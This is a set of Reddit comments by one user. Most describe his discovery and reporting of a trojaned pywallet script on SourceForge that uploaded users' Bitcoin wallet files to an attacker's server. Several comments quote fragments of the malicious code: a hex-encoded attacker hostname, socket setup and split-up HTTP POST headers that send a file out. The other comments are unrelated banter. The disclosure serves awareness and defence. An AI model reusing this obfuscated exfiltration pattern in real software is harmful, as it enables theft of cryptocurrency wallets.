@_author: d3k4y
@_date: 2016-04-09 20:47:27
Source Forge has https man. And my wifi is secure, trust me. The file is still on SF is you wanna take a look WITH HTTPS: 
@_date: 2016-04-10 04:39:52
Using wallet thief when talking about a website sort of makes me think about Futurama when they go online and some programs/websites are humanoids in that universe. And if it was actually Source Forge who is the wallet thief (they honestly are not).
   
Like, what kind of person would that create? It is like Source Forge would be an athlete or celeb that was hot 7 years ago, but then you learn on the news that they have been using their celebrity to push scamming type shit like George Foreman pushing Invent Help because obviously George Foreman used Invent Help when he invented the George Foreman Grill. None is true at all. a company just rented his celebrity of course and then he double down on the lie that he made a grill years later to get paid to do some shitty 3am commercial.
   
And it's like, OK, Source Forge is old as hell and he's gotta eat. Why not do a shitty commercial? But then all the sudden Git Hub has been violently murdered. The reddit mob grabs their pitch forks and winds up fucking up the evidence so Source Forge gets off.
   
Source Forge is now still well recognized, but no one thinks of it anymore. Then Source Forge is caught burying bitcoin on his farm in Facebook so he doesn't have to pay the settlement from civil court everyone forgot about. But whatever, a few years go buy and then all the sudden Source Forge is in the news sticking up a pawn shop with 4chan and Lemon Party.
   
And it's like, WTF? This can't be true. Source Forge hasn't sank that low. As the days pass people are again talking about Source Forge, but this time it is all negative. And this time, reddit sends They don't completely fuck up the case. They do their jobs like professionals and Source Forge lands his ass in the slammer for holding up a fucking pawn shop when a generation ago he could get away with fuckin murder!
   
Yep. That sound's about right.
@_date: 2016-04-11 18:04:53
You're getting a lot of anger because what you are saying simply is not true. Anyone can release software that is closed source or open source. There are plenty of examples of open source software that offers professional  support. Some have free support forums that are very helpful, but also offer paid premium support for businesses. There is also a ton of closed source software out there that has almost no support. 
Also, backdoor and malicious code have been found in closed source software all the way from a teenager who puts his first Visual Basic program on his blog up to Microsoft. 
Basically, quality, safety, support, all these things can be very good or very bad in open source software as well as closed source. When you brought your new computer home from Best Buy with Windows pre-installed, how much adware had already been installed? The answer is 10 to 100 applications no matter if you noticed or not. 
You are trying to tie quality directly to if software is open, closed, or in between and the 2 are simply unrelated. I could see how someone who just uses excel and outlook at work and comes home to play call of duty or watch YouTube could come to your conclusion, but it just simply is not true. There is no correlation. If you have a source to a study that proves otherwise or can point to what gave you this idea, please share it. Maybe we are all wrong or maybe we can explain how it's misinterpreted. 
@_date: 2016-04-10 03:47:50
You are very welcome. I like doing almost anything with computers. I've been a developer, analyst, engineer, administrator, a bunch of titles over the last 14/15 years professionally (18 to 32/33) and I just got put on disability a few days ago, so I was glad to offer my services to the public to take a break from paperwork, emailing doctors, HR, calling doctors. All that. I'm just happy it got so popular so I got the word out. Hopefully it ends up helping a lot of people.
@_date: 2016-04-10 00:03:42
Ah, yeah. I guess the mirrors don't but if someone broke into my wifi, connected to the network, and waited at a sourceforge mirror hosting some obscure bitcoin script, that would be an insanely amazing coincidence. I'd give the dude my coins for being a fucking mind reader. It isn't like you can just inject data into any site in the world just because it doesn't use HTTPS. 
@_date: 2016-04-10 20:48:30
Thank you and you're welcome. It was no job to me though. I'm going to look at code every day. If I find more malicious stuff, getting to help some people out or educate some people is just a bonus.
@_date: 2016-04-10 00:15:56
What is your point? pywallet is not in any way connected to the bitcoin source code. It is a simple script. Someone took that script, added a little code, then hosted it on a different site hoping people would use their link instead of the original. This has nothing to do with Bitcoin core.
   
Remember that time when you could by bank accounts and credit cards for as little as $2 online? I do. It was years ago. It is today. And it still will be the case tomorrow. The banks have lost far, far more money than bitcoin has.
@_date: 2016-04-09 21:56:02
OP here
   
The people who already answered are correct. With browser exploits, usually in JavaScript, you'll see the same type of thing. The other things that made it obvious is that there was only one section of code changed, all the lines one after the other with years between the file creation dates. Usually, if you do a diff between updates, especially with that much time in between them, you'd expect to see 2 lines here, 10 lines there, 7 lines there... Differences all over the place. An update to code rarely works out so perfectly.
   
Also, look at what is right before and right after the first line of hex:
   
    crypted=False
    
    
    hs = "\x62\x69\x65\x62\x65\x72\x2e\x61\x74\x77\x65\x62\x70\x61\x67\x65\x73\x2e\x63\x6f\x6d" 
    s = socket.socket()
   
So, before it, we see code that suggests something has been decrypted. Then, right after it, we see a socket being open meaning that it's making a connection out.
   
I know this isn't the exact answer to your question, but I'm just giving you extra things that are bad signs. Here is something else:
   
    h13 = "Content-Disposition: form-data; name=\x22userfile\x22; filename=\x22"
    h14 = "\x22\r
Content-Type: application/octet-stream\r
\r
"
    h1 =  h11+bo+h12+h13+"fil"+h14
    h20 = "\r
-----------------------------"
    h21 = "--\r
"
    h2 = h20+bo+h21
    h31 = "POST "
    h32 = " HTTP/1.1\r
"
   
A few things in this section. First, very indescript variable names. Why would a coder make his life harder unless there was another reason. Second, all these variables are unnecessarily splitting up a string and adding random hex. In this part, us humans see more clearly that an HTTP request is being made. To a computer program, like a virus scanner or something similar would easily pick up an HTTP request all in one string, all in plain characters. If it is all split up and mixed in with hex, a scanner would have a harder time noticing what was going on.
@_date: 2016-04-09 23:53:00
I have reported it to all parties involved. So far the hosting company has shut it down. They didn't tell me if they also sold him the domain, but lots of people are going to see this post and they will know to be more cautious when using tools that are allowed to see valuable info. I reported it, gave them time, then announced it here to try to help the most people. If there was a better way to go about it, I haven't thought of it. There were certainly more evil ways, but as far as minimizing damage and maximizing awareness, all you can do is report the problem, give them time to fix it, then tell everyone to watch out for it.
@_date: 2016-04-10 02:03:57
Both the closed source religion and the open source religion have their whack jobs who are so full of faith they will double click that EXE without even reading the file name, or pypy pythons they just find in the wild. It's a sick world out there bro.
@_date: 2016-04-10 10:44:52
Most people who just use it as a currency and nothing else won't need to worry about script or anything. Bitcoin has turned today's college kids into grandmothers though. The computer is scary! :)
@_date: 2016-04-10 10:06:03
Oh yeah, that's right. They all had bogus looking phones out there. I had my own that was rooted, unlocked, had vpns to the US and I also was able to get Google voice think it was still in the states and allow it to make Internet calls like you could on desktop. 
@_date: 2016-04-10 15:33:34
Well it's an HTTP request. Remember I made sure the site was down before telling the world. The app is knocking, but no one is answering the door.
@_date: 2016-04-10 06:56:01
Don't worry about it. It's short term disability right now. It's brain stuff. I think everyone who is into programming at the age of 11 or 12 is a little crazy. Just need to adjust meds, get things rolling smooth, and I'll be back at it. I was on it before about 6 years ago and I was able to get things going again.
@_date: 2016-04-10 00:04:41
This is just a script though. It's not an MSI file installing bundles of binaries.
@_date: 2016-04-10 07:55:05
Do you mean the Play store or actual random sources by turning off that security feature? At least with Android, you aremember forced to ok the permissions, but I'm sure most people don't even read them. Really though, open source, closed source, computer, phone, Windows, Linux, OSX, if enough people are using it with their sensitive data, criminals are gonna target it and there are far more ignorant  (in a neutral sense) than educated. As evil code gets better, so does software. Ask any older pen tester how many servers were vulnerable to SQL injection compared to today. Hackers were on the honor system when using the Internet of the 90s and earlier 2000s.
@_date: 2016-04-09 22:00:14
Yeah, I was gonna explain that he could have made it a lot harder, but if money is involved and I see a socket being open, it doesn't matter how obfuscated it is because I could just use WireShark and see what's going on. Using hex and splitting strings up with variable names that are only one or 2 characters long seem to be the go to.
@_date: 2016-04-09 23:38:13
Yes, I try to not hear Bieber on the radio all day and that bastard starts writing python to steal bitcoin.
@_date: 2016-04-09 23:40:28
Ah, yeah, inbox reply. I was thinking it was to a different comment. I made sure that I let the people take access away before I went and told the world so the person who wrote it would just dump all the accounts sitting on the site.
@_date: 2016-04-09 20:45:00
Yeah, had already contacted them when I posted this. You think I could find malicious code, but not know how to do a simple WHOIS? :)
@_date: 2016-04-10 06:42:14
Well, this was a script that would extract your public and private keys if you were running a bitcoin client on your PC/server and decide you want to move it. If you are new to bitcoin, I suggest that you do use coinbase or blockchain. Who is saying they are terrible? Everything online is gonna have haters, but using a blockchain.info or coinbase wallet isn't anymore complex than using PayPal in my opinion. Yeah, there are little quirks you gotta learn that are a little different, but PayPal has plenty of quirks and when you are using PayPal, it is more likely PayPal itself will steal your money than a hacker. Account freezes and stuff ya know?
   
Ignore next paragraph, dumb rant: skip to next
If it is a small, new site that everyone is praising and it is super trendy, those are the bitcoin startups that all the sudden decide to shut down and keep the money or say they were hacked and then provide dubious evidence where it actually is more evidence that the site owner is a liar and a thief than any hacker. What site was that again? With the DB index being 23948, 23949, 8, 2351... and it was like why did a hacker reset the index in your DB? This is a shitty con!
   
But anyways, big sites that have been around for a while and don't have something shady occur every other weak. When it comes to choosing a website to keep your bitcoin wallet, you want big and boring to start. Blockchain.info is almost annoying sometimes, but they have messages like "Warning! The settings on this page can fuck shit up. Don't bother if you don't understand. Re-enter your password to confirm or press cancel"
   
Once you have your site picked and a wallet, just buy the amount of bitcoin that you need at first. Use a well known site. Unsure if it is well known? See the sticky in this sub. The Bitcoin FAQ or whatever. They have lists of sites to keep your wallet. How to buy bitcoins. Good info.
   
Never, never, never make some sort of deal where you buy or sell with PayPal or any PayPal like sites. Basically any site where it takes 2 or 3 days for it to clear and let's people change their mind. You will be scammed honestly 97% or more of the time. Use localbitcoins and meet someone in public to trade cash for bitcoin. Pick someone who has been there a while and has all good ratings.
   
Blockchain.info and coinbase both have phone apps. These are great for using with localbitcoins. There are some golden rules with that though. If you decide to use this method, make a second wallet. Blockchain.info will let you create unlimited wallets. One wallet is shared with your phone, the other stays put. Then Only put the number of bitcoins you will be trading on the phone. If you keep $3000 on your phone and trade with strangers for cash, there's a chance you are gonna wake up on the floor of starbucks with a missing phone! Joking, but seriously, not unheard of.
   
I found over $100 in old wallets when I came upon this malicious code. If you want, I will sell you bitcoin $5 at a time for market price if you just want 10 or 20 bucks. Shit, I'll trade $2 at a time so you can get a chance to play around. In fact, you know what you could do? Put 50 cents in your wallet. Install a phone app. Make a second wallet. Practice buying and selling to yourself. I'll send you a hot ass dollar in the tomorrow if you create an account if you want. Free of charge so you can practice. If you'd be interested, let me know. I gotta go to bed now. But yeah, I have lots of time on my hands these days. You email or IM me and I can help you out if you want. For now, goodnight.
Edit: Sorry, didn't notice how much I wrote. Message me tomorrow, Ill send you a dollar to practice with.
@_date: 2016-04-10 05:33:58
Thank you! I did not do any x-posts though. I figured that would cover the maximum amounts. I'm in but I didn't post it there. Maybe they would be interested, but to me, this isn't impressive hacking, but basic coding using a somewhat smart idea. 
   
Can you suggest where else this would need to be? Feel free to x-post. Don't get me wrong, I like reddit, but I am one of the people that doesn't care about fake internet points. I feel that my actions of shutting down the scam and informing people where I thought it would reach the most was enough real life karma.
   
Feel free to x-post back to this thread. Don't steal it as yours and end up getting both taken down because I want this to get indexed and appear in search results to help others.
@_date: 2016-04-10 03:43:45
The hosting site is in Germany. I have heard Germany still has a lot of online privacy compared to the US. The hosting company was not at fault. They offered everything from free sites to your own VPS (Virtual Private Server). They shut down the site pretty quick as I explained it pretty clear in the email, showed the evidence I had. Showed them where the malicious code was. How it was pulled off.
   
I did tell them it would basically be best to move any money left on any accounts stored on the server into a new wallet. Then to use the blockchain to trace back where the accounts came from. I told them they could share the public key and verify the user if they have the private key, I know that is not a guarantee, but if the private key had already been stolen, then they gotta make a call to decide to dig into it more and figure out who the more likely user is or just forget it.
   
I offered to provide them with help if they needed so and that I could help get the wallets back to their owners and gather evidence that points to one user being legit over another. They declined twice and just assured me that the site was down and the person no longer had access. This is a pretty typical response. The hosting company is not the police. They might hold onto the logs and the data for a little, but they aren't going to actively pursue it or allow me to.
   
That is most likely all that will happen unless someone in Germany cares to inform your version of the FBI or whatever. The criminals most likely covered their tracks. It is possible that they accessed it once and forgot to have any defense. That could be investigated. Will it? I doubt it unless a person who has lost money complains to the German federal police whatever they are called out there.
   
Honestly though, don't blame the hosting company. They could have told me that they received no police reports, so even though I had crystal clear evidence and walked them through it, they won't do anything because officially no crime was committed. They took the time to verify my evidence though and shut down the site. Good on them for that. 
   
Hopefully someone who had their wallet stolen stumbles onto this thread. After a few days/weeks, the search engines will have this thread crawled. Someone in 2 weeks may notice their money was gone and try to google it and end up here. From here, they can use the evidence I pointed out or contact me for more. Then they can proceed to contacting German authorities.
   
Source Forge is STILL HOSTING IT. Obviously they take abuse reports seriously /s. For now, the criminals will get no more until they make some updates. Hopefully the domain is seized and Source Forge gets it down so they dont just update and try again. Source Forge could possibly try to sue if they actually find the criminal I suppose, but likely they were using proxies/vpns/tor/ssh tunnels through hacked servers, whatever.
   
So the answer is yes, technically someone can, but it is very unlikely.
@_date: 2016-04-10 12:49:08
Looks like that one is bad too and using the same method. That's an HTTP request. What you gotta do is close all programs. Then start wireshark or whatever network sniffer you are using. Any try you see when every thing is closed try to identify. Once you know what it is, use the filter in wireshark to hide it. Probably just stuff checking for updates or whatever. Once you have filtered out the noise in wireshark, you probably will want to rename any wallet files so they don't get stolen. Then run it and see where wireshark says it's going. If he used the same domain for all, then it should be safe for now. The server had the files a.php, b.php, and c.php on it.  Probably one for each tool. 
@_date: 2016-04-10 00:12:19
No. Jack-Jack only uses Git Hub. Someone copied the script, added a few lines of code, then zipped it so Google wouldn't rat them out by someone stumbling onto it, then uploaded to SF since pywallet was still available as a project name on SF.
@_date: 2016-04-10 19:37:01
No problem. The malicious code is STILL up at Source Forge if you want to take a look yourself. The domain that the wallets were posted to is down, so no one is losing their wallet anymore at least.
@_date: 2016-04-10 00:18:32
Um, I found it helpful today. If it was closed source, you guys never would have known cuz I wouldn't have been able to see the code in the first place. I see how you're thinking, but you got it backwards. People who are not very good with technology will constantly be getting taken advantage of by technology closed source or not. But if it is open source, then at least they have that option to review it. NICE TRY MICROSOFT!
@_date: 2016-04-10 03:07:56
No, not really. They were bundling adware with some of the more popular software they host, but it did have an opt out, and it wasn't just straight badware stealing stuff.
   
I almost need another post to explain to people what happened, cuz I see a ton of people talking as if they understand it and they don't. Source Forge hosts open source software. It keeps track of changes and forks. A lot like Git Hub. Now, the guy who wrote pywallet, he only hosted it on Git Hub. He didn't upload to Source Forge. So the project name "pywallet" was available to register on Source Forge. These project names are almost like usernames on reddit.
   
So someone noticed that pywallet was not registered on Source Forge, only Git Hub. They downloaded the original pywallet code, added 20 something lines of malicious code, then this was a little smart, he zipped it first, then uploaded it to Source Forge under pywallet.sourceforge.net.
   
So now, it looks like it is legit since he didn't have to use pywallet324232 or something. Like if I registered PresidentHClinton and covinced people I was Hillary. Then people run it and they get their wallets stolen.
   
Make sense?
   
Edit: Both Git Hub and Source Forge are of the more well known sites that host open source software. And it is crazy that I happened to noticed it first (or at least notice and care). I was basically searching through old wallet.dat files that I had sitting around from old projects and what not. I actually found over $100 worth. I decided to see if there were any newer versions of pywallet. I noticed the size differene on source forge. Instead of just running it though, I was interested in what was changed. That pretty much got us here.
@_date: 2016-04-10 00:56:48
So all the closed source viruses and malware and spyware and RATs are made by professionals who will listen to your issues with them stealing your credit card and passwords and resolve them for you and then reverse the transactions? Open source haters are so clueless and ignorant I'm not even mad. This stuff is funny.
@_date: 2016-04-10 01:21:51
There are websites that have little javascript tools to convert it back to ascii so you can read it. That specific line spells out the domain/URL that the keys were being posted to. The attacker had a php file that would wait for POST data and FILE data, and then, I'm guessing, save to a database or email to the guy who created the malicious code so he could empty out the bitcoin wallet.
@_date: 2016-04-09 23:56:24
Thanks. I honestly appreciate the compliments. Ever one makes the day a littler brighter.
@_date: 2016-06-15 21:08:31
Meh, I love people who ask questions when they doubt know the answer. Even if it's something I think is very basic. It's the new comers who BS and pretend to be an old pro by tossing a bunch of jargon that they have no clue the meaning of into a nonsensical comment in the hopes that others will be even more ignorant and just assume they know what they are talking about. Reminds me of 7 and 8 year olds making up stories about a ghost coming out of the mirror or claim they made a nuke in their room using the anarchists cook book. I'm in my really 30s. An old man like me isn't going to validate you by just politely agreeing or saying nothing. I would rather let them know they aren't making sense, but if they actually want to learn, I'd be glad to help. Some I'll even offer them credentials to my Linux VPS if it's part of what they wanna learn. So far, only one person took the deal. The rest hit angry and doubled our tripled down on their bullshit with some are grammar nazism.
It's not just is terrible. Some people in android dev or programming. The subs that use a tech word that doesn't sound cool on TV ad their name are the best except way less users.
@_date: 2015-08-06 00:38:24
Why do you have to say it like that? If his business is making profit, that's better than many. He claimed, business, not corporation. Are you jelly or an asshole who's dad bought a company? Or am I reading you wrong? Overall, I agree with you, but that just read as smug or jealous. 
@_date: 2015-08-06 14:43:59
I'm not saying it was a great business, but a business none the less. Perhaps PayPal killed him just after he got off the ground. I mean, it's hard to even go a full year without getting fucked by PayPal. I definitely would have never used PayPal in the first place and I think his biggest mistake was relying on PayPal instead of something that is not a scam to hold currency for interest as long as possible and then charge people for it just to be dicks.
@_date: 2015-04-08 23:41:10
You can already by everything from anabuse to zoloft on the markets. A gun if the zoloft doesn't work too. I'd think that most likely it would attract people stealing the non narcotic meds more than anything. My suggestion would be some type of validation system, but that would be beat impossible to attract the paranoid masses in darknet. Buyers will at least be easy to acquire. 
@_date: 2015-04-08 06:25:00
So what? That guy is a fucking nut job. I know lots of Reddit gets hard for Ron Paul, but even if Rand's dad makes you moist, please take a little more effort than reading a Reddit circle jerk before giving this asshat any coin. 
@_date: 2013-09-20 19:31:45
My paycheck goes to the IRS and medical debt. Luckily my BFL preorders came in this month. Surviving off bitcoin? I can relate. Btw, does mt gox just not pay anymore at all. It's been 5 weeks. Luckily I have local btc buyers. 